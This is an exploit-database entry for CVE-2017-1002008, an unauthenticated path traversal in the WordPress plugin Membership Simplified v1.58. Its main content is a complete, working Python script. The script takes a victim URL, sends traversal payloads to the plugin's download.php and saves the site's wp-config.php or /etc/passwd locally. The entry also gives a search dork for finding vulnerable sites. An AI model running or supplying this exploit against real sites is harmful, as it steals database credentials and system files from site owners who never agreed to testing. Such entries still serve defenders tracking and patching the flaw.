Wordpress Plugin Membership Simplified v1.58 - Arbitrary File Download

2017.03.16
ke Munir Njiru (KE) ke
Risk: High
Local: No
Remote: Yes
CVE: CVE-2017-1002008
CWE: CWE-23
Dork: inurl:/wp-content/plugins/membership-simplified-for-oap-members-only/


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

import requests import string import random from urlparse import urlparse print "---------------------------------------------------------------------" print "Wordpress Plugin Membership Simplified v1.58 - Arbitrary File Download\nDiscovery: Larry W. Cashdollar\nExploit Author: Munir Njiru\nWebsite: https://www.alien-within.com\nCVE-2017-1002008\nCWE: 23\n\nReference URLs:\nhttp://www.vapidlabs.com/advisory.php?v=187" print "---------------------------------------------------------------------" victim = raw_input("Please Enter victim host e.g. http://example.com: ") file_choice=raw_input ("\n Please choose a number representing the file to attack: \n1. Wordpress Config \n2. Linux Passwd File\n") if file_choice == "1": payload="..././..././..././wp-config.php" elif file_choice == "2": payload="..././..././..././..././..././..././..././..././etc/passwd" else: print "Invalid Download choice, Please choose 1 or 2; Alternatively you can re-code me toI will now exit" quit() slug = "/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file="+payload target=victim+slug def randomizeFile(size=6, chars=string.ascii_uppercase + string.digits): return ''.join(random.choice(chars) for _ in range(size)) def checkPlugin(): pluginExists = requests.get(victim+"/wp-content/plugins/membership-simplified-for-oap-members-only/download.php") pluginExistence = pluginExists.status_code if pluginExistence == 200: print "\nI can reach the target & it seems vulnerable, I will attempt the exploit\nRunning exploit..." exploit() else: print "Target has a funny code & might not be vulnerable, I will now exit\n" quit() def exploit(): getThatFile = requests.get(target) fileState = getThatFile.status_code breakApart=urlparse(victim) extract_hostname=breakApart.netloc randomDifferentiator=randomizeFile() cleanName=str(randomDifferentiator) if fileState == 200: respFromThatFile = getThatFile.text if file_choice == "1": resultFile=extract_hostname+"_config_"+cleanName+".txt" print resultFile pwned=open(resultFile, 'w') pwned.write(respFromThatFile) pwned.close print "Wordpress Config Written to "+resultFile else: resultFile=extract_hostname+"_passwd"+cleanName+".txt" pwned=open(resultFile, 'w') pwned.write(respFromThatFile) pwned.close print "Passwd File Written to "+resultFile else: print "I am not saying it was me but it was me! Something went wrong when I tried to get the file. The server responded with: \n" +fileState if __name__ == "__main__": checkPlugin()

References:

https://www.alien-within.com/wordpress-plugin-membership-simplified-v1-58-arbitrary-file-download/
https://wpvulndb.com/vulnerabilities/8777
http://www.vapidlabs.com/advisory.php?v=187


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top